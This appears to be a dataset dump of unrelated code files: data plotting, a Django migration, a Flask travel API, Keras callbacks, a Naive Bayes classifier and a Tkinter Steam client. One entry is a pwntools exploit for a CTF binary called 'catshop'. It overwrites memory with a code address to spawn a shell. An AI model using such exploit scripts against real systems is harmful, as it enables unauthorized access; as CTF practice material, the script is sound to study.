text stringlengths 38 1.54M |
|---|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
# Weekly avocado prices; code below reads .region, .type and .AvgPrice columns.
avo = pd.read_csv("avocado.csv")
# Pre-computed per-region price data; code below reads .region and a 'diff' column.
_df = pd.read_csv("merge.csv")
def plot_trend(region):
    """Plot conventional vs. organic average price for one region and save it."""
    plt.clf()
    for kind, label in (("conventional", "conv"), ("organic", "org")):
        subset = avo[(avo.region == region) & (avo.type == kind)]
        subset.AvgPrice.plot.line(label=label)
    plt.legend()
    plt.savefig(f'img/{region}.png')
def plot_diff(region):
    """Plot the 'diff' series for *region* and save it as a PNG."""
    plt.clf()
    series = _df.loc[_df.region == region, 'diff']
    series.plot.line()
    plt.savefig(f'img/{region}_diff.png')
def main():
    """Generate a diff plot for every region present in the avocado data."""
    for region in avo.region.unique():
        plot_diff(region)
        # plot_trend(region)


if __name__ == '__main__':
    main()
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jul 11 15:06:05 2019
@author: Sergiy Horef
"""
# Switcher: permanently swaps the values stored under two keys of a dictionary.
class Switcher():
    """Swap the values of two keys in a dictionary, remembering the last swap
    so that ``str()`` and ``repr()`` can describe it.

    Fixes: the original ``__init__`` did a no-op ``self = self`` and never set
    ``letters``/``letter_one``/``letter_two``, so ``__str__``/``__repr__``
    raised ``AttributeError``.
    """

    def __init__(self):
        # Attributes referenced by __str__/__repr__; filled in by switch().
        self.letters = None
        self.letter_one = None
        self.letter_two = None

    def switch(self, letters, letter_one, letter_two):
        """Swap ``letters[letter_one]`` and ``letters[letter_two]`` in place."""
        self.letters = letters
        self.letter_one = letter_one
        self.letter_two = letter_two
        # RHS pops both keys first, then both are re-inserted with swapped values.
        letters[letter_one], letters[letter_two] = letters.pop(letter_two), letters.pop(letter_one)

    def __str__(self):
        return 'This is a switcher, which switches {self.letter_one} with {self.letter_two}'.format(self=self)

    def __repr__(self):
        return '{self.__class__.__name__}({self.letters}, \'{self.letter_one}\', \'{self.letter_two}\')'.format(self=self)
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-08-27 18:37
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated schema migration for the ``cars`` app: adds an optional
    ``tyre_type`` column and tightens the types of several ``Car`` fields."""

    dependencies = [
        ('cars', '0002_auto_20160827_2331'),
    ]

    operations = [
        # New optional free-text column.
        migrations.AddField(
            model_name='car',
            name='tyre_type',
            field=models.CharField(blank=True, max_length=50, null=True),
        ),
        # Existing columns converted to stricter types (floats / sized chars).
        migrations.AlterField(
            model_name='car',
            name='acceleration',
            field=models.FloatField(),
        ),
        migrations.AlterField(
            model_name='car',
            name='front_brake_type',
            field=models.CharField(max_length=30, null=True),
        ),
        migrations.AlterField(
            model_name='car',
            name='rear_brake_type',
            field=models.CharField(max_length=30, null=True),
        ),
        migrations.AlterField(
            model_name='car',
            name='turning_radius',
            field=models.FloatField(),
        ),
    ]
|
# CTF exploit script for the local 'catshop' binary (pwntools). It drives the
# target's menu protocol over stdin; each p32(n) is presumably a menu choice —
# confirm against the binary's menu handler.
from pwn import *
#p = remote('211.117.60.76',8888)
elf = ELF('./catshop')
context(terminal = ['xterm', 'splitw'])
p = process('catshop')
#gdb = attach(p)
p.send(p32(1))
p.send(p32(2))
p.send(p32(4))
p.send(p32(5))
# Little-endian 0x080488b6 followed by a NUL — presumably a code/GOT address
# written into a reused buffer/object (use-after-free style); TODO confirm.
p.send('\xb6\x88\x04\x08\x00')
p.send(p32(3))
p.send(p32(3))
p.send(p32(3))
p.send(p32(3))
# Hand the (hopefully spawned) shell over to the user.
p.interactive()
|
from flask import Flask
from flaskext.mysql import MySQL
from flask import jsonify, json
from flask import request
from alg4 import TSP
import query
import firebase_admin
import requests
from firebase_admin import credentials, auth
from operator import itemgetter
import datetime
import public_config
app = Flask(__name__)
# Firebase Admin SDK: used below for user creation and token minting.
credential = credentials.Certificate("./travelbuddy-firebase.json")
firebase_app = firebase_admin.initialize_app(credential=credential)
# Google Identity Toolkit endpoint used to verify email/password logins.
_verify_password_url = 'https://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyPassword'
# MySQL connection, configured from the public_config module.
mysql = MySQL()
app.config['MYSQL_DATABASE_USER'] = public_config.db_user
app.config['MYSQL_DATABASE_PASSWORD'] = public_config.db_password
app.config['MYSQL_DATABASE_DB'] = public_config.db_name
app.config['MYSQL_DATABASE_HOST'] = public_config.db_host
mysql.init_app(app)
@app.route('/')
def hello_world():
    """Liveness endpoint."""
    greeting = 'Hello World!'
    return greeting
@app.route('/register/', methods=["POST"])
def register_page():
    """Create a Firebase user from a JSON body with name/email/phone/password.

    Returns ``{'success': 1, 'token': ..., ...}`` on success, ``{'success': 0}``
    on any failure (errors are printed, not surfaced to the client).
    """
    error = ''  # unused; kept as-is
    try:
        if request.method == "POST":
            jsonReq = request.get_json()
            name = jsonReq['name']
            email = jsonReq['email']
            phone = jsonReq['phone']
            password = jsonReq['password']
            user = auth.create_user(display_name=name, email=email, phone_number=phone, password=password)
            # Custom token lets the client sign in as the new user.
            token = auth.create_custom_token(user.uid)
            return json.jsonify({'success':1, 'token': token.decode('utf-8'), 'email': email, 'name': name, 'phone': phone})
        return json.jsonify({'success':0})
    except Exception as e:
        # NOTE(review): broad catch — any KeyError/auth failure becomes success:0.
        print ("error: " + str(e))
        return json.jsonify({'success':0})
@app.route('/login/', methods=["POST"])
def login_page():
    """Verify an email/password pair against Google Identity Toolkit and return
    the Firebase user's basic profile on success."""
    error = ''  # unused; kept as-is
    try:
        if request.method == "POST":
            jsonReq = request.get_json()
            print(jsonReq)
            email = jsonReq['email']
            password = jsonReq['password']
            body = {'email': email, 'password': password}
            params = {'key': public_config.firebase_api_key}
            resp = requests.request('post', _verify_password_url, params=params, json=body)
            # 'registered' is true when the credentials match an existing user.
            if bool(resp.json().get('registered')):
                user = auth.get_user_by_email(email)
                return json.jsonify({'success': 1, 'email': user.email, 'name': user.display_name, 'uid': user.uid})
            else:
                return json.jsonify({'success': 0})
        return json.jsonify({'success': 0})
    except Exception as e:
        # NOTE(review): broad catch — network/auth failures all map to success:0.
        print("error: " + str(e))
        return json.jsonify({'success': 0})
@app.route('/flights')
def get_flights():
    """Solve a small TSP over the requested destinations and return the
    cheapest itinerary found.

    Query args: ``origin``, ``destinationNumber``, ``startDate``, plus
    ``destination<i>``/``duration<i>`` pairs for each destination index.
    """
    origin = request.args.get('origin')
    destination_number = int(request.args.get('destinationNumber'))
    start_date = request.args.get('startDate')
    destinations = dict()
    for i in range(destination_number):
        destinations[request.args.get('destination' + str(i))] = int(request.args.get('duration' + str(i)))
    trip = origin, destinations, [start_date, start_date]
    print(trip)
    tsp = TSP(trip)
    tsp.fromOrigin()
    # tsp.paths entries are (price, flights); pick the cheapest by price.
    cheapestTrip = sorted(tsp.paths, key=itemgetter(0))[0]
    response = dict()
    response["success"] = 1
    response["price"] = cheapestTrip[0]
    response["flights"] = cheapestTrip[1]
    print(cheapestTrip)
    return jsonify(response)
@app.route('/addTrip/', methods=['POST'])
def add_trips_handler():
    """Persist a trip for a user.

    Optional JSON body fields: ``email``, ``trip``, ``startDate``; missing
    fields fall back to placeholder defaults. Returns ``{'success': 1, ...}``
    on insert, ``{'success': 0, ...}`` on failure.
    """
    cmd = ''
    try:
        if request.method == "POST":
            reqJson = request.get_json()
            user_email = 'sample@gmail.com'
            user_trip = 'MY TRIP'
            # Default start date: today, as YYYY-MM-DD.
            date = datetime.date.today().strftime('%Y-%m-%d')
            if "email" in reqJson:
                user_email = str(reqJson['email'])
            if "trip" in reqJson:
                # Strip the outer JSON brackets. Manual quote-escaping was
                # removed: the query below is parameterized.
                user_trip = json.dumps(reqJson['trip'])[1:-1]
            if "startDate" in reqJson:
                date = str(reqJson['startDate'])
            print(date)
            conn = mysql.connect()
            cursor = conn.cursor()
            # SECURITY FIX: the previous str.format()-built INSERT was open to
            # SQL injection through all three fields; use placeholders instead.
            cmd = "INSERT INTO flights (email, flight_info, start_date) VALUES (%s, %s, %s)"
            cursor.execute(cmd, (user_email, user_trip, date))
            conn.commit()
            response = {'email': user_email, 'success': 1}
            return json.jsonify(response)
        return json.jsonify({'success':0})
    except Exception as e:
        print ("error: " + str(e))
        return json.jsonify({'success':0, 'error': str(e), 'cmd': cmd})
@app.route('/trips/', methods=["GET"])
def trips_handler():
    """Return the ``flight_info`` of every upcoming trip for a user (today or
    later), keyed by the ``email`` query argument."""
    user_email = request.args.get('email', default="tobincolby@gmail.com", type=str)
    conn = mysql.connect()
    cursor = conn.cursor()
    date = datetime.date.today().strftime('%Y-%m-%d')
    # SECURITY FIX: parameterized query — the previous str.format() version was
    # injectable through the email query argument.
    cursor.execute('SELECT * from flights WHERE email=%s AND start_date >= %s', (user_email, date))
    trips = []
    row = cursor.fetchone()
    while row is not None:
        trips.append(row[2])  # column 2 holds flight_info
        row = cursor.fetchone()
    return json.jsonify({'flights': trips, 'success': 1, 'email': user_email})
@app.route('/restaurants/getByCity', methods=["GET"])
def restaurants_handler():
    """Return Yelp business listings for each requested destination city.

    Query args: ``destNum`` plus ``dest<i>`` for each destination index.
    """
    num_destinations = int(request.args.get('destNum'))
    destinations = [request.args.get('dest' + str(i)) for i in range(num_destinations)]
    businesses = []
    for destination in destinations:
        result = query.run_yelp_query(query.searchQuery(location=destination))
        businesses.extend(result["data"]["search"]["business"])
    return json.jsonify({"business": businesses})
if __name__ == '__main__':
    # Development entry point; use a proper WSGI server in production.
    app.run()
|
# coding: utf-8
# É dobro
# (c) Héricles Emanuel, UFCG, Programação 1
num_1 = int(raw_input())
num_2 = int(raw_input())
if num_2 == num_1 / 2 or num_1 == num_2 / 2:
print "SIM"
else:
print "NAO" |
def hello():
    """Emit a fixed greeting on stdout."""
    message = 'hellooooo'
    print(message)
def greet():
    """Emit a fixed status line on stdout."""
    text = 'still here'
    print(text)
def something(func):
    """Invoke *func* with no arguments and return its result.

    Fixed: the original called ``func()`` but discarded the return value,
    so callers always got ``None``.
    """
    return func()
a = something(greet)
|
import numpy as np
import tensorflow as tf
from tensorflow.python.keras import models
from sklearn.metrics import confusion_matrix
# For validation on multiple scales
from tensorflow.python.keras.preprocessing.image import ImageDataGenerator
from tensorflow.python.keras.utils import Sequence
'''
Callback for training with multiple validatons sets.
'''
class MultiVal(tf.keras.callbacks.Callback):
    """Keras callback that evaluates several validation sets after each epoch.

    NOTE(review): every entry of ``val_data`` is scored against the same
    ``val_target`` array — confirm this is intended (e.g. the same samples at
    multiple scales).
    """

    def __init__(self, val_data, val_target, batch_size):
        super().__init__()
        self.validation_data = val_data
        self.validation_target = val_target
        self.batch_size = batch_size
        self.val_loss = []  # flat history: one entry per (epoch, validation set)
        self.val_acc = []

    def on_epoch_end(self, epoch, logs=None):
        # Fixed: the original used a mutable default argument (``logs={}``);
        # Keras' callback convention is ``logs=None``.
        for validation_data in self.validation_data:
            loss, acc = self.model.evaluate(validation_data, y=self.validation_target, batch_size=self.batch_size, verbose=0)
            self.val_loss.append(loss)
            self.val_acc.append(acc)

    def to_dict(self):
        """Return the accumulated metric histories as a plain dict."""
        return {'val_loss': self.val_loss, 'val_acc': self.val_acc}
'''
Callback for assessing the contrubutinon of each scale to the merging.
'''
class TrackAddition(tf.keras.callbacks.Callback):
    """Track, per epoch, the relative contribution of each input branch to
    every merging ('add') layer, measured on a fixed data subset."""

    def __init__(self, val_data, num, batch_size, num_contrib):
        # num: how many samples to track; num_contrib: number of tensors
        # feeding each 'add' layer.
        super().__init__()
        self.val_data = val_data
        self.num = num
        self.batch_size = batch_size
        self.num_contrib = num_contrib
        if self.num < len(self.val_data):
            # Track a random subset of the validation data.
            self.ind = np.random.choice(len(self.val_data), self.num, replace=False)
            self.track_data = self.val_data[self.ind]
        else:
            self.ind = np.arange(len(self.val_data))
            self.track_data = self.val_data
        if self.num == 1:
            # Keep a leading batch dimension for a single sample.
            self.track_data = self.track_data[..., np.newaxis]
        self.mean_c = {}  # per-add-layer mean contribution history
        self.std_c = {}   # per-add-layer std-dev contribution history
        self.output = []
        self.add_layers = []
        self.ind_add = []
        self.track_model = []

    def set_data(self, ind, val_data):
        """Replace the tracked indices/data after construction."""
        self.ind = ind
        self.val_data = val_data

    def layers_ind(self):
        """Locate 'add' layers (skipping the first) and build a side model whose
        outputs are each add layer plus its num_contrib preceding layers.

        Rebuilt only once; subsequent calls are no-ops.
        """
        if not self.add_layers:
            self.add_layers = [layer.name for layer in self.model.layers if 'add' in layer.name][1:]
            layers = [layer.name for layer in self.model.layers]
            ind = np.where(np.isin(layers, self.add_layers))[0]
            c = 0
            for i in ind:
                # Assumes the num_contrib layers directly before an add layer
                # are its inputs (by model topology ordering) — TODO confirm.
                self.ind_add.append(np.arange(i-self.num_contrib, i+1, dtype='int'))
                self.mean_c[f'c_{c}'] = []
                self.std_c[f'c_{c}'] = []
                c += 1
            self.ind_add = [x for sublist in self.ind_add for x in sublist]
            self.output = []
            for i in self.ind_add:
                self.output.append(self.model.get_layer(index=i).output)
            print(self.output)
            self.track_model = models.Model(inputs=self.model.input, outputs=self.output)

    def on_train_begin(self, logs=None):
        self.layers_ind()

    def on_epoch_end(self, epoch, logs=None):
        # For each add layer, express each input's summed activation as a
        # fraction of the merged (last) output's summed activation.
        output = self.track_model.predict(self.track_data, batch_size=self.batch_size, verbose=0)
        n = len(self.add_layers)
        s = len(output) // n  # outputs per add-layer group (inputs + merged)
        for i in range(n):
            total = np.sum(output[i*s + s-1], axis=(1, 2, 3))
            m_c = []
            s_c = []
            for j in range(i*s, (i+1)*s-1):
                m_c.append(np.mean(np.sum(output[j], axis=(1, 2, 3))/total, axis=0))
                s_c.append(np.std(np.sum(output[j], axis=(1, 2, 3))/total, axis=0, ddof=1))
            self.mean_c[f'c_{i}'].append(m_c)
            self.std_c[f'c_{i}'].append(s_c)

    def get_contrib(self):
        """Return [mean_contributions, std_contributions]."""
        return [self.mean_c, self.std_c]
'''
Callback for assessing convergence error of low and high components of the target function.
'''
class FilterError(tf.keras.callbacks.Callback):
    """Measure convergence error separately for the low- and high-frequency
    components of the target function at fixed checkpoint epochs.

    The low component is a Gaussian-kernel smoothing (bandwidth ``delta``)
    over the sampled test inputs; the high component is the residual.
    """

    def __init__(self, x_test, y_test, batch_size, delta, epochs, num_ckpts, num_samples=0.1):
        # num_samples: fraction of the test set (float) or absolute count (int).
        if isinstance(num_samples, float):
            self.num_samples = int(np.ceil(num_samples*len(y_test)))
        else:
            self.num_samples = num_samples
        print(self.num_samples)
        ind = np.random.choice(len(y_test), self.num_samples, replace=False)
        self.x_test = x_test[ind]
        self.y_test = y_test[ind]
        self.batch_size = batch_size
        self.delta = delta
        self.epochs = epochs
        self.num_ckpts = num_ckpts
        # Epochs at which the error is evaluated.
        self.ckpts = np.ceil(np.linspace(0, self.epochs-1, self.num_ckpts)).astype(int)
        print(self.ckpts)
        self.e_low = []
        self.e_high = []

    def error(self, y_pred):
        """Vectorized low/high error (memory heavy: builds an NxN kernel)."""
        G = np.array([x - self.x_test for x in self.x_test])
        G = np.exp(-np.sum(np.square(G), axis=(2, 3, 4)) / (2 * self.delta))
        G = G[..., np.newaxis]
        y_low = np.sum(self.y_test[np.newaxis, ...] * G, axis=1) / np.sum(G, axis=1)
        h_low = np.sum(y_pred[np.newaxis, ...] * G, axis=1) / np.sum(G, axis=1)
        y_high = self.y_test - y_low
        h_high = y_pred - h_low
        # Relative L2 errors of the low and high components.
        e_low = np.sqrt(np.sum(np.sum(np.power(y_low - h_low, 2), axis=1)) / np.sum(np.sum(np.power(y_low, 2), axis=1)))
        e_high = np.sqrt(
            np.sum(np.sum(np.power(y_high - h_high, 2), axis=1)) / np.sum(np.sum(np.power(y_high, 2), axis=1)))
        return e_low, e_high

    def error_loop(self, y_pred):
        """Looped version of ``error`` — slower, but O(N) memory."""
        y_low = np.zeros_like(self.y_test)
        h_low = np.zeros_like(self.y_test)
        for i in range(len(self.y_test)):
            G = np.exp(-np.sum(np.square(self.x_test[i] - self.x_test), axis=(1, 2, 3))/(2*self.delta))[..., np.newaxis]
            y_low[i] = np.sum(self.y_test * G, axis=0) / np.sum(G)
            h_low[i] = np.sum(y_pred * G, axis=0) / np.sum(G)
        y_high = self.y_test - y_low
        h_high = y_pred - h_low
        e_low = np.sqrt(np.sum(np.sum(np.square(y_low - h_low), axis=1)) / np.sum(np.sum(np.square(y_low), axis=1)))
        e_high = np.sqrt(np.sum(np.sum(np.square(y_high - h_high), axis=1)) / np.sum(np.sum(np.square(y_high), axis=1)))
        return e_low, e_high

    def on_epoch_end(self, epoch, logs=None):
        # Only evaluate at the pre-computed checkpoint epochs.
        if any(epoch == self.ckpts):
            y_pred = self.model.predict(self.x_test, batch_size=self.batch_size)
            e_low, e_high = self.error_loop(y_pred)
            self.e_low.append(e_low)
            self.e_high.append(e_high)

    def get_error(self):
        """Return (e_low, e_high) reshaped to [num_repetitions, num_ckpts]."""
        num_reps = len(self.e_low) // self.num_ckpts
        return np.reshape(self.e_low, [num_reps, self.num_ckpts]), np.reshape(self.e_high, [num_reps, self.num_ckpts])
'''
Callback for extracting a confusion matrix
'''
class ConfusionMatrixCB(tf.keras.callbacks.Callback):
    """Compute a confusion matrix on a validation generator when training ends."""

    def __init__(self, validation_generator):
        self.validation_generator = validation_generator

    def on_train_end(self, logs=None):
        # True labels in the generator's (shuffled) order; the generator is
        # expected to expose ``y`` and ``indexes`` attributes.
        y_true = self.validation_generator.y[self.validation_generator.indexes]
        y_pred = np.argmax(self.model.predict_generator(self.validation_generator, verbose=0), axis=-1)
        self.cm = confusion_matrix(y_true, y_pred)

    def get_cm(self):
        """Return the confusion matrix computed at the end of training."""
        return self.cm
'''
Callback for removing skip-connections from a Top-Down model; removing the skip connections removes
a certail scale from the Top-Down model.
'''
class NegateSkipConnections(tf.keras.callbacks.Callback):
    """After training, zero out one or both named skip-connection layers and
    record test accuracy for each configuration (original weights restored)."""

    def __init__(self, test_data, layer_names):
        self.test_data = test_data
        self.layer_names = layer_names  # [mid-skip name, high-skip name]
        self.test_acc = []

    def get_layers(self):
        """Cache both skip layers and their original weights."""
        self.skip_2 = [layer for layer in self.model.layers if layer.name == self.layer_names[0]][0]
        self.orig_weights_2 = self.skip_2.get_weights()
        self.weights_shape_2 = self.orig_weights_2[0].shape
        self.skip_1 = [layer for layer in self.model.layers if layer.name == self.layer_names[1]][0]
        self.orig_weights_1 = self.skip_1.get_weights()
        self.weights_shape_1 = self.orig_weights_1[0].shape
        print(self.weights_shape_2, self.weights_shape_1)

    def on_train_end(self, logs=None):
        self.get_layers()
        # Weight sets of [zeros, zeros, zeros, ones] — presumably matching a
        # 4-tensor normalization layer layout; TODO confirm the layer type.
        zeros_2 = np.zeros(self.weights_shape_2)
        zeros_2 = [zeros_2, zeros_2, zeros_2, np.ones_like(zeros_2)]
        zeros_1 = np.zeros(self.weights_shape_1)
        zeros_1 = [zeros_1, zeros_1, zeros_1, np.ones_like(zeros_1)]
        # 1) Original model.
        _, acc = self.model.evaluate(self.test_data, verbose=0)
        self.test_acc.append(acc)
        # 2) Mid skip zeroed.
        self.skip_2.set_weights(zeros_2)
        _, acc = self.model.evaluate(self.test_data, verbose=0)
        self.test_acc.append(acc)
        self.skip_2.set_weights(self.orig_weights_2)
        # 3) High skip zeroed.
        self.skip_1.set_weights(zeros_1)
        _, acc = self.model.evaluate(self.test_data, verbose=0)
        self.test_acc.append(acc)
        # 4) Both zeroed.
        self.skip_2.set_weights(zeros_2)
        _, acc = self.model.evaluate(self.test_data, verbose=0)
        self.test_acc.append(acc)
        # Restore original weights and sanity-check.
        self.skip_1.set_weights(self.orig_weights_1)
        self.skip_2.set_weights(self.orig_weights_2)
        loss, acc = self.model.evaluate(self.test_data, verbose=0)
        print(f"After restore loss:{loss}, acc:{acc}")

    def get_test_acc(self):
        """Accuracies in order: original, no-mid, no-high, neither."""
        return self.test_acc
'''
A custom augmentation generator.
'''
class AugmentationGenerator(Sequence):
    """Keras Sequence serving shuffled, augmented (X, y) mini-batches."""

    def __init__(self, X, y, batch_size, shuffle=True):
        self.X = X
        self.y = y
        self.batch_size = batch_size
        self.shuffle = shuffle
        self.index = np.arange(len(X), dtype=int)
        self.checked = []  # indices served this epoch (coverage sanity check)
        # Augmentation: small width/height shifts plus horizontal flips only.
        self.augmenter = ImageDataGenerator(
            featurewise_center=False, samplewise_center=False, featurewise_std_normalization=False,
            samplewise_std_normalization=False, zca_whitening=False, zca_epsilon=1e-06, rotation_range=0,
            width_shift_range=0.1, height_shift_range=0.1, brightness_range=None, shear_range=0.0, zoom_range=0,
            channel_shift_range=0., fill_mode='nearest', cval=0., horizontal_flip=True, vertical_flip=False,
            rescale=None, preprocessing_function=None, data_format='channels_last', validation_split=0,
            dtype='float32')
        self.augmenter.fit(X)
        self.on_epoch_end()

    def __len__(self):
        # Number of batches per epoch.
        return int(np.ceil(len(self.X) / self.batch_size))

    def __getitem__(self, index):
        indexes = self.index[index * self.batch_size:(index + 1) * self.batch_size]
        self.checked.extend(indexes)
        # Draw exactly one augmented batch for these indices (labels unchanged).
        return self.augmenter.flow(self.X[indexes], batch_size=len(indexes), shuffle=False).next(), self.y[indexes]

    def on_epoch_end(self):
        if len(np.unique(self.checked)) == len(self.X):
            print("All checked")
        self.checked = []
        if self.shuffle:
            np.random.shuffle(self.index)
'''
Callback for a 3-stage learning rate decay scheme.
'''
class scheduler_3_stage(tf.keras.callbacks.Callback):
    """Learning-rate schedule: multiply the rate by 0.1 at 50% and 80% of
    training (stateful; intended for use as a LearningRateScheduler callable)."""

    def __init__(self, lr, num_epochs):
        self.lr = lr
        self.num_epochs = num_epochs

    def __call__(self, epoch):
        drop_epochs = {int(np.ceil(0.5*self.num_epochs)), int(np.ceil(0.8*self.num_epochs))}
        if epoch in drop_epochs:
            self.lr *= 0.1
        return self.lr
'''
Callback for a 4-stage learning rate decay scheme.
'''
class scheduler_4_stage(tf.keras.callbacks.Callback):
    """Learning-rate schedule: multiply the rate by 0.2 at 40%, 70% and 90% of
    training (stateful; intended for use as a LearningRateScheduler callable)."""

    def __init__(self, lr, num_epochs):
        self.lr = lr
        self.num_epochs = num_epochs

    def __call__(self, epoch):
        drop_epochs = {int(np.ceil(f * self.num_epochs)) for f in (0.4, 0.7, 0.9)}
        if epoch in drop_epochs:
            self.lr *= 0.2
        return self.lr
|
from scipy.io import loadmat
import numpy as np
import pickle
import pandas as pd
news = loadmat('news.mat')
def get_params(Xtr, Ytr):
    """Fit per-class Bernoulli Naive Bayes parameters in log space.

    Uses add-one style smoothing: mu = (1 + feature_count) / (2 + class_count).
    Returns {class_label: {'bias': scalar, 'weights': array}} where the class
    score of a row x is x . weights + bias.
    """
    labels = Ytr.flatten()
    n_total = len(labels)
    fitted = {}
    for label in set(labels):
        rows = np.where(labels == label)[0]
        n_class = len(rows)
        mu = (1 + Xtr[rows].sum(axis=0)) / (2 + n_class)
        prior = n_class / float(n_total)
        log_mu = np.log(mu)
        log_not_mu = np.log(1 - mu)
        fitted[label] = {
            'bias': np.log(prior) + log_not_mu.sum(),
            'weights': log_mu - log_not_mu,
        }
    return fitted
def get_error_rate(params, Xtest, Ytest):
    """Return the fraction of test rows classified incorrectly.

    For each row x, the score of class c is x . w_c + b_c; the predicted
    label is the class with the highest score. Labels are compared via
    ``int(testLabel[0])``, so Ytest rows must be indexable (e.g. an Nx1 array).

    Fixed: ``params.iteritems()`` is Python-2-only; ``.items()`` works on
    both Python 2 and 3.
    """
    total_count = len(Ytest)
    wrong_count = 0
    for testVector, testLabel in zip(Xtest, Ytest):
        x = testVector
        maxLL = float('-inf')
        minLabel = None
        for key, value in params.items():
            w = value['weights']
            b = value['bias']
            pred = x.dot(w.T) + b
            if pred > maxLL:
                maxLL = pred
                minLabel = key
        if int(minLabel) != int(testLabel[0]):
            wrong_count += 1
    errorRate = float(wrong_count) / total_count
    return errorRate
# ---- Script body (Python 2: print statements, legacy pandas API) ----
# Fit Naive Bayes parameters on the training matrices.
Xtrain = news['data']
Ytrain = news['labels']
params = get_params(Xtrain, Ytrain)
#print "Training error:", get_error_rate(params, Xtrain, Ytrain)
Xtest = news['testdata']
Ytest = news['testlabels']
#print "Test error:", get_error_rate(params, Xtest, Ytest)
# vocab: 1-based line number -> word (one word per line in news.vocab).
vocab = {}
with open("news.vocab") as f:
    for key, line in enumerate(f):
        key = key+1
        val = line.replace("\n",'')
        vocab[int(key)] = val
# group: group id -> newsgroup name ("name id" pairs in news.groups).
group = {}
with open("news.groups") as f:
    for line in f:
        (val, key) = line.split()
        group[int(key)] = val
# Rebuild the same lookups as DataFrames so they can be merged below.
dfv = pd.read_csv("news.vocab",header=None)
dfv.columns = ['word']
dfv['vuid'] = dfv.index + 1
dfg = pd.read_csv("news.groups",header=None)
dfg.columns = ['topic']  # declare column name
dfg['topic'] = dfg.topic.str.split(' ',1).str[0]
dfg['guid'] = dfg.index + 1
# One row per class: 'bias' and 'weights' columns (ndarray-valued cells).
df = pd.DataFrame(params)
df = df.T
df['guid'] = df.index
print df.head(20)
print dfv.head(20)
print dfg.head(20)
df = df.merge(dfg, on='guid', how='left')
print df.head(20)
dfw = df[['weights']]
dfw = dfw['weights'].tolist()
df_list = []
# For each class, expand its weight vector and keep the 20 largest weights.
for i, k in enumerate(dfw):
    j = k.tolist()
    df = pd.DataFrame(j)
    df = df.T
    df.columns = ['weights']
    df['guid'] = i + 1
    df['vuid'] = df.index + 1
    df = df.sort('weights', ascending=False).head(20)  # legacy pandas (<0.20) API
    print df.head(25)
    df_list.append(df)
df = pd.concat(df_list)
# Attach the word (vuid) and newsgroup (guid) labels, then export.
df = df.merge(dfv, on='vuid', how='left').merge(dfg, on='guid', how='left')
print df.head(25)
df.to_csv('hw1-2.csv',index=False)
|
import os
import threading
from tkinter import *
from tkinter import ttk
from tkinter.font import Font
from urllib.error import HTTPError
from PIL import ImageTk
from gevent.exceptions import LoopExit
from Grafieken import DataScherm
from EchoSensor import Sr04
from Loginbutton import LoginButton
from Neopixel import Neopixel
from Quicksort import Quicksort
from Schuifregister import Schuifregister
from Servo import Servo
from Statistiek import Statistiek
from SteamClientAPI import SteamClientAPI
from SteamWebAPI import SteamWebAPI
class SteamGUI:
    """Tkinter GUI for the SteamPI client: shows a live Steam friend list and
    drives the attached hardware (neopixel, servo, shift register, SR04)."""

    def __init__(self, client):
        """Initialise all widget/sensor attributes, build the window, start
        the sensors and enter the Tk mainloop (blocks)."""
        self.client = client
        self.username, self.password = self.client.get_credentials()
        self.root = None
        self.button = None
        self.sr04 = None
        self.Button = None
        self.servo = None
        self.favoriet = "begin"  # sentinel value: no favourite selected yet
        self.status = None
        self.onlinetimer = None
        self.friendtimer = None
        self.groot_font = None
        self.titelframe = None
        self.afsluitButton = None
        self.berichtframe = None
        self.user_label = None
        self.favoriet_label = None
        self.msg_button = None
        self.clear_button = None
        self.friendframe = None
        self.treeview = None
        self.online = None
        self.schuifregister = None
        self.selecteditem = None
        self.runfriendlist = True
        self.runonline = True
        self.loginbutton = None
        self.neopixel = None
        self.onlinetimer = None
        self.friendlist_timer = None
        self.databutton = None
        self.statistiekbutton = None
        self.servobuttonframe = None
        self.collijst = None
        self.needs2bsorted = False
        self.api = SteamWebAPI()
        self.root = Tk()
        self.root.attributes("-fullscreen", True)
        self.open_gui(True)
        self.start_sensoren(True)
        self.start_gui()  # blocks in the Tk mainloop
    def open_gui(self, stopbutton):
        """Build and pack all GUI widgets; add the quit button if *stopbutton*."""
        if os.environ.get('DISPLAY', '') == '':
            os.environ.__setitem__('DISPLAY', ':0.0')  # fix for the Raspberry Pi
        self.groot_font = Font(size=30)
        bg = ImageTk.PhotoImage(file='pexels-photo-2763927.jpg')
        background_label = Label(image=bg)
        background_label.image = bg  # keep a reference so Tk doesn't GC the image
        background_label.place(x=0, y=0, relwidth=1, relheight=1)
        bgcolor = "#4B0082"
        self.titelframe = Label(font=self.groot_font, background=bgcolor, foreground="white", text="SteamPI Client")
        self.databutton = Button(text="Data", command=self.open_data,
                                 background=bgcolor, foreground="white", font=self.groot_font)
        self.statistiekbutton = Button(text="Statistiek", command=self.open_statistiek,
                                       background=bgcolor, foreground="white", font=self.groot_font)
        self.berichtframe = Frame(background=bgcolor)
        self.user_label = Label(self.berichtframe, font=self.groot_font, foreground="white", background=bgcolor,
                                text="Volg de status van een vriend.")
        self.favoriet_label = Label(self.berichtframe, foreground="white", font=self.groot_font, background=bgcolor,
                                    text="Huidige favoriet: Geen")
        self.servobuttonframe = Frame(self.berichtframe, background=bgcolor)
        self.msg_button = Button(self.servobuttonframe, text="Stel in", command=self.check_online,
                                 background=bgcolor, foreground="white", font=self.groot_font)
        self.clear_button = Button(self.servobuttonframe, text="Stop", command=self.timerstop,
                                   background=bgcolor, foreground="white", font=self.groot_font)
        if stopbutton:
            self.afsluitButton = Button(text="Afsluiten", command=self.stop,
                                        background=bgcolor, foreground="white", font=self.groot_font)
            self.afsluitButton.pack(side=BOTTOM, pady=5)
        self.titelframe.pack(side=TOP, pady=60, padx=30)
        self.servobuttonframe.pack(side=BOTTOM, expand=1, fill=X, pady=5)
        self.friendframe = Frame(self.berichtframe, background=bgcolor)
        self.berichtframe.pack(pady=30, padx=30)
        self.user_label.pack()
        self.favoriet_label.pack()
        self.msg_button.pack(side=LEFT)
        self.clear_button.pack(side=RIGHT)
        self.friendframe.pack()
        self.databutton.pack(side=RIGHT)
        self.statistiekbutton.pack(side=LEFT)

    def clear_gui(self, afsluitbutton):
        """Hide all widgets; include the quit button if *afsluitbutton*."""
        if afsluitbutton:
            self.afsluitButton.forget()
        self.titelframe.forget()
        self.databutton.forget()
        self.statistiekbutton.forget()
